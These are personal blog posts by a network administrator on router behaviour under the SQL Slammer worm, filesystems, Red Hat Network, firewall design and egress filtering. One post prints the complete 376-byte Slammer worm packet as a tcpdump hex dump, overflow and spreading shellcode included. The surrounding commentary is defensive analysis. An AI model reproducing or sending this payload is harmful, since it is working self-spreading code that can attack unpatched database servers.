This article from O’Reilly goes over the impact the Slammer worm had on routers. I’ve commented below…

This article explains a bit about ReiserFS. While ext3 has likely removed the need to choose ReiserFS simply for journalling, Reiser has some performance features that make it attractive for applications that use lots of small files, such as cache engines.

High end routers make use of route caching to improve performance, usually processing the first packet the slow way so that successive packets an go the quick way. However, the worm is only one packet long, so the router’s caching is for naught. A router’s primary task is to route packets, if it gets too busy there it will drop other tasks, such as routing protocol handling. Do this on your BGP link, and you’ll flap. Flap, and you get dampened. Get dampened, and you’re offline for a bit.

This behaviour isn’t limited to the worm. You know those printer management tools that flood your network with SNMP requests looking for printers? Yea, they’ll do that too. I can’t count the number of 2am pages I had until I figured that one out.

Last issue of the Linux newsletter out the door.

What do do with my new found free time?

- Study for the CCIE-Written
- Try to get an article in print
- Work on some projects I’ve been putting off
- Spend more time with the family.

… I’m done. More specifically, I’m done with the Linux Newsletter. I guess advertising isn’t what it used to be, so the powers-that-be at Cramsession stopped my newsletter, a few others, and reduced the freqency of some others.

It was fun while it lasted. Thanks to all my readers, especially those of you who wrote in with your comments and suggestions.

I’ve always been cheap and handled patching of Red Hat systems myself, usually by keeping a local mirror of the updates tree. I recently started using the Red Hat network - $5US per machine per month - to keep about 10 machines in order.

It’s completely web based. I get an email when a patch is out of date. A couple of clicks, and a system is updated. At any time I can check the status of my machines, and see if they are up to date, or even install new software. Why have I been wasting my time before?

Plus, as a coworker points out, it’s giving money to Red Hat, which is a Good Thing (no, I’m not a shareholder).

If you’re installing Red Hat, I’d suggest signing up to RHN. Your first machine is free, so you’ve got little to lose.

Why is it that developers want to turn your firewalls into routers?

I spent a good part of my afternoon trying to convince some developers that the IIS web server should be separated from the rest of the databases (think “confidential information” here). In the event that the web server (which speaks to the Internet) gets rooted, the attacker is right next to the crown jewels. At least if there is a firewall in the way, he’s got more work to do, and more chance that he’ll trip an alarm.

In the end, we compromised. Still not happy, but tradeoffs have to happen.

So I figure that I should at least customize this site, make it look *somewhat* different than the default MT theme. Trouble is, I haven’t done any real HTML in ages, I’ve always done my coding and passed it off to the designers.

MT uses CSS. Even though I could ignore them and start over, I guess I should get with it and hash it out. The specifications are good, as are Darren Harkness’ tutorials on Cramsession

I’ve figured out enough of this MT thing to get a separate staging area going. Time will tell. Time will tell.

This whole SQL worm thing has got me in a knot. Not because it ruined a good Saturday afternoon, but because it points out the ineptitude of admins out there.

I’m not talking about the people who didn’t patch their SQL servers. Keeping up with all the Microsoft patches must be hell. No, I’m talking about the people that run the networks.

For fun, I fired up tcpdump on my gateway and looked at the source addresses of the people attacking me. I saw several RFC 1918 addresses – you know them, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16. What are they doing on the Internet? Did the admins of the site not block them going outbound, or at least, NAT? How did these packets traverse the backbone?

We live in an insecure world because everyone is pointing their fingers the other way. We complain that we get DOSed, yet we don’t take measures to ensure that we can’t be a launching point for DOS (Egress filtering. Look it up.) As much as I think Microsoft puts out buggy software, keeping up to date on patches is not the complete solution.

Wake up, people. Filter. Sanity check. Be a good internet neighbour.

It’s amazing that 376 bytes can do some serious damage to the Internet.

This SQL worm that is running around is pretty simple. Overflow. Send. Repeat.

http://www.boredom.org/~cstone/worm-annotated.txt

13:19:05.663164 168.156.112.158.3151 > h24-85-10-25.wp.shawcable.net.ms-sql-m: udp 376
4500 0194 76f7 0000 7811 8eb9 a89c 709e
1855 0a19 0c4f 059a 0180 ed53 0401 0101
0101 0101 0101 0101 0101 0101 0101 0101
0101 0101 0101 0101 0101 0101 0101 0101
0101 0101 0101 0101 0101 0101 0101 0101
0101 0101 0101 0101 0101 0101 0101 0101
0101 0101 0101 0101 0101 0101 0101 0101
0101 0101 0101 0101 0101 0101 01dc c9b0
42eb 0e01 0101 0101 0101 70ae 4201 70ae
4290 9090 9090 9090 9068 dcc9 b042 b801
0101 0131 c9b1 1850 e2fd 3501 0101 0550
89e5 5168 2e64 6c6c 6865 6c33 3268 6b65
726e 5168 6f75 6e74 6869 636b 4368 4765
7454 66b9 6c6c 5168 3332 2e64 6877 7332
5f66 b965 7451 6873 6f63 6b66 b974 6f51
6873 656e 64be 1810 ae42 8d45 d450 ff16
508d 45e0 508d 45f0 50ff 1650 be10 10ae
428b 1e8b 033d 558b ec51 7405 be1c 10ae
42ff 16ff d031 c951 5150 81f1 0301 049b
81f1 0101 0101 518d 45cc 508b 45c0 50ff
166a 116a 026a 02ff d050 8d45 c450 8b45
c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45
b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829
c28d 0490 01d8 8945 b46a 108d 45b0 5031
c951 6681 f178 0151 8d45 0350 8b45 ac50
ffd6 ebca

People nag me because I haven’t updated my site in ages. Maybe this will shut them up :)